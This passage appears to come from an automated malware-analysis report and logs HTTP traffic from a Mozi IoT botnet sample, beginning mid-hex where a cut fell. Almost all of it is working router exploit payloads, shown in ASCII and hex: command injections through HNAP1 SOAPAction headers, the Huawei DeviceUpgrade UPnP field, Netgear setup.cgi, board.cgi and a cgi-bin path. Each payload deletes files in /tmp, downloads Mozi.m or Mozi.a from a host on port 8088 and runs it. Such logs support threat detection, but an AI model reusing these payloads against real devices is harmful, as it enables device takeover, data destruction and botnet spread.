65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 21.13.16.113:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 4.249.18.39:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 157.228.236.27:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 142.129.125.98:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 55.147.173.201:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 9.68.251.66:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 95.236.96.161:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                            Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Host: 217.147.92.195:37215Content-Length: 601Connection: keep-aliveAuthorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 20 2d 6c 20 2f 74 6d 70 2f 68 75 61 77 65 69 20 2d 72 20 2f 4d 6f 7a 69 2e 6d 3b 63 68 6d 6f 64 20 2d 78 20 68 75 61 77 65 69 3b 2f 74 6d 70 2f 68 75 61 77 65 69 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 192.168.1.1:8088 -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
